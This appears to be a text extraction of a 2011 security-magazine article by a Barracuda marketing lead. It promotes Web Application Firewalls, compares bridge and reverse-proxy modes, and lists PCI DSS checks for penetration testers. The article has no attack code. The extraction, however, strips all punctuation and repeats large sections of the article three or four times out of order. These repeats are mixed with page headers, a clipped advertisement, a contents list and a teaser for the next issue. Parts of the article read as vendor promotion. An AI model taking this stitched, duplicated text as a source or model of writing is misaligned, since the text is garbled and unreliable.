How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-